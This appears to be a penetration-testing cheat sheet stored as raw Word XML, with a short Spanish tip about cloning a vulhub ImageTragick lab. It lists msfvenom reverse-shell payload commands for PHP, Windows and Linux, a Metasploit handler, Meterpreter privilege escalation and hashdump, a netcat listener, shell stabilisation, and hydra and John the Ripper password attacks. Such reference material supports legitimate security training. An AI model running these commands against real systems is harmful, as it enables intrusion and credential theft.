          <w:trHeight w:val="4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Search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exploit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msf5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search apache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Use exploit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by number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msf5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use 1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Use exploit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by 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msf5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use exploit/multi/handler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Set parameter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msf5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payload windows/x64/meterpreter/reverse_tcp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Show parameters and other options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msf5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show options</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155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example, to configure a listener for a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table47"/>
        <w:tblW w:w="5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5075"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="5075"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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msfconsole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use exploit/multi/handler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payload &lt;REVERSE SHELL PAYLOAD&gt;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LHOST &lt;LISTENER IP&gt;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LPORT &lt;LISTENER PORT&gt;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exploit</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E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8ln7g9qh8k4g" w:id="36"/>
      <w:bookmarkEnd w:id="36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Generate Payload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msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160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Standard PHP reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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.34062345878473"/>
        <w:gridCol w:w="8846.171187564838"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="179.34062345878473"/>
            <w:gridCol w:w="8846.171187564838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msfvenom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php/reverse_php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LHOST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&lt;LISTENER IP&gt;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LPORT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&lt;LISTENER PORT&gt;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-o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&lt;OUTPUT FILE NAME&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000163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Windows reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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.82495120677535"/>
        <w:gridCol w:w="8871.686859816848"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="153.82495120677535"/>
            <w:gridCol w:w="8871.686859816848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msfvenom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windows/x64/meterpreter/reverse_tcp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LHOST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&lt;LISTENER IP&gt;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LPORT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&lt;LISTENER PORT&gt;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dll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shell.dll</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000167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Linux reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5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.81680957010187"/>
        <w:gridCol w:w="8860.695001453521"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="164.81680957010187"/>
            <w:gridCol w:w="8860.695001453521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msfvenom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linux/x64/shell/reverse_tcp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LHOST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&lt;LISTENER IP&gt;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LPORT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&lt;LISTENER PORT&gt;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elf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shell.elf</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kl1t69ht31j4" w:id="37"/>
      <w:bookmarkEnd w:id="37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Meterpreter Shell Commands</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table51"/>
        <w:tblW w:w="7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860"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="6860"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="6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background current session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list current open sessions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open session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-i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&lt;SESSION NUMBER&gt;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privilege escalation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Windows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getsystem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list system information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sysinfo/route/getuid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dump Windows hashes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hashdump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upload file to system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meterpreter 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download &lt;FILE NAME&gt; /path/to/directory</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183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188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gqhytmszi9b" w:id="38"/>
      <w:bookmarkEnd w:id="38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Listener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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netcat</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table52"/>
        <w:tblW w:w="2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600"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="26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nc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-nvlp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PORT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187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n: IP addresses only (no DNS)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v: verbose mode (-vv for very verbose)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l: listen for incoming connections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p: local port to listen on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C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For example:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table53"/>
        <w:tblW w:w="2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2600"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="26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nc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-nvlp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4444</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F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Style w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="40" w:before="240" w:line="288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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t3vveqpm8zz" w:id="39"/>
      <w:bookmarkEnd w:id="39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Stabilise a Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191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Spawn an interactive terminal via Python:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table54"/>
        <w:tblW w:w="7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980"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="6980"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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First check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the system has Python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which python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/usr/bin/python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Then, spawn a Python shell using pty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01040"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"import pty; pty.spawn('/bin/bash')"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Finally,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export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XTERM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allows you to clear terminal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export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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TERM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xterm</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019C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NOTE: this works the same with python3.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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3oi055q99s4r" w:id="40"/>
      <w:bookmarkEnd w:id="40"/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Bruteforcing</w:t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188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zfly9qb14e69" w:id="41"/>
      <w:bookmarkEnd w:id="41"/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hydra</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5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.6638682006219"/>
        <w:gridCol w:w="8824.847942823"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="200.6638682006219"/>
            <w:gridCol w:w="8824.847942823"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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hydra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&lt;LIST OF USERNAMES&gt;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&lt;LIST OF PASSWORDS&gt; &lt;TARGET&gt; &lt;SERVICE&gt;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&lt;PORT&gt;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8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hydra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&lt;USERNAME&gt;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&lt;LIST OF PASSWORDS&gt;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&lt;TARGET&gt; &lt;SERVICE&gt;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&lt;PORT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6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7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085"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="7085"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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Bruteforce SSH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hydra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users.txt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pass.txt 10.10.10.2 ssh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22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hydra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users.txt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pass.txt ssh://10.10.10.2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888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Bruteforce FTP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hydra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admin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passwords.txt 192.168.1.4 ftp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21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hydra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-l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admin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passwords.txt ftp://192.168.1.4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B0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pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:before="280" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_49vbk8bix58r" w:id="42"/>
      <w:bookmarkEnd w:id="42"/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John The Ripper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First, prepare a file for john to crack:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table57"/>
        <w:tblW w:w="4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4400"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="44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unshadow passwd shadow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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="34343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34343c"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crack the passwords:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table58"/>
        <w:tblW w:w="7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085"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="708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john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--wordlist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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt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260" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="4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OJO Importante!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BB">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="4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 ocasiones podemos tener problemas a la hora de importar cualquier herramienta o proyecto de GitHub con lo que tendremos que manipular la entrada a consola para no tener esos problemas, ej:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="42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71717" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone 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ffffff"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:shd w:fill="171717" w:val="clear"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick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4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 este caso con la manera tradicional de clonar este proyecto nos daria error, por lo que vamos a usar la manera alternativa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BE">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="42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svn checkout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71717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ffffff"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:shd w:fill="171717" w:val="clear"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/vulhub/vulhub/trunk/imagemagick/imagetragick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42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line="4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Como podemos ver sustituimos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="4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git clone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/ svn checkout </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="4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/././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tree/master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/././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/././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trunk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/././</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C3">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="300" w:line="4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 esto evitariamos tener ningun tipo de problema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34343c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34343c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34343c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ulhub/vulhub/tree/master/imagemagick/imagetragick" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetrag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